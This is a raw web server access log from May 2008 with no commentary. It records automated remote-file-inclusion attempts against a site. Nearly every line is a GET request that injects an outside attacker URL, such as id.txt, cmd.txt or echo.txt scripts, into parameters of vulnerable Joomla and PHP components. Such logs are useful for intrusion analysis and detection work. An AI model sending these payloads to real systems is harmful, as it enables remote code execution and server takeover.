89.108.93.123 - - [04/May/2008:09:37:50 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:38:14 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:38:43 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:38:58 -0700] "GET /logs/home.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:38:58 -0700] "GET /home.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:39:06 -0700] "GET /logs/access_071218.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:39:07 -0700] "GET /logs//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:39:13 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; .NET CLR 1.1.4322)" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:39:15 -0700] "GET /logs/home.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:39:15 -0700] "GET /home.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:39:38 -0700] "GET /logs/access_080315.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:39:41 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:09:39:46 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:09:39:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:39:52 -0700] "GET /logs/port.php?content=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:39:52 -0700] "GET /port.php?content=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:40:01 -0700] "GET /homepage.php?sel=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:40:20 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:09:40:32 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:09:40:33 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:40:45 -0700] "GET /logs/main.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:40:45 -0700] "GET /main.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:40:46 -0700] "GET /index2.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:40:46 -0700] "GET /logs/access_071216.log//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:40:46 -0700] "GET //spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:40:47 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:40:49 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:40:50 -0700] "GET /logs/access_080131.log//spaw_control.class.php?spaw_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:41:21 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:41:24 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:41:49 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator)" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:09:41:55 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:42:17 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:42:30 -0700] "GET /logs/home.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:42:31 -0700] "GET /home.php?x=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:42:45 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:42:57 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:43:06 -0700] "GET /logs/port.php?content=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:43:06 -0700] "GET /port.php?content=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:43:15 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:09:43:18 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:09:43:18 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:09:43:18 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:09:43:19 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:09:43:19 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:09:43:24 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:43:32 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:43:34 -0700] "GET /logs/index.php?incl=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:43:38 -0700] "GET /index.php?incl=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:43:43 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:09:43:57 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:43:59 -0700] "GET /lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:43:59 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:09:44:05 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:09:44:12 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:09:44:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:09:44:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:09:44:13 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:44:14 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:44:15 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:44:30 -0700] "GET /convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.151.217.136 - - [04/May/2008:09:44:34 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:44:37 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:44:47 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:44:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:44:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:45:17 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:09:45:44 -0700] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:09:45:44 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:45:45 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0)" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:09:45:46 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:45:54 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:45:56 -0700] "GET /logs/index.php?incl=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:09:46:00 -0700] "GET /index.php?incl=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:46:14 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:09:46:14 -0700] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.15.58.22 - - [04/May/2008:09:46:21 -0700] "GET /logs/access_071218.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:46:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:46:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:46:42 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:46:57 -0700] "GET /logs/access_080312.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:09:47:12 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:09:47:13 -0700] "GET //Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:47:14 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:09:47:26 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:09:47:26 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:09:47:26 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:47:40 -0700] "GET /logs/access_071218.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:47:41 -0700] "GET /logs//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:47:45 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:48:01 -0700] "GET /logs/access_080315.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:48:21 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:48:22 -0700] "GET /index.php?go=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:48:35 -0700] "GET /logs/port.php?content=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:48:36 -0700] "GET /port.php?content=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [04/May/2008:09:48:37 -0700] "GET //account.php?action=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:09:48:48 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:09:48:48 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:48:50 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:48:55 -0700] "GET /logs/home.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:48:55 -0700] "GET /home.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:09:49:05 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:09:49:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:09:49:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
165.228.215.195 - - [04/May/2008:09:49:08 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [04/May/2008:09:49:09 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.228.215.195 - - [04/May/2008:09:49:10 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:49:21 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:49:43 -0700] "GET /logs/index1.php?site=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:49:43 -0700] "GET /logs/index1.php?site=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:49:43 -0700] "GET /index1.php?site=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:49:43 -0700] "GET /index1.php?site=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:49:49 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
165.228.215.195 - - [04/May/2008:09:49:51 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:09:50:03 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.184.24 - - [04/May/2008:09:50:04 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:50:20 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
68.165.216.146 - - [04/May/2008:09:50:27 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:50:54 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:09:51:06 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgd-k25.org/forum//includes/error/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:51:14 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:51:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:09:51:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
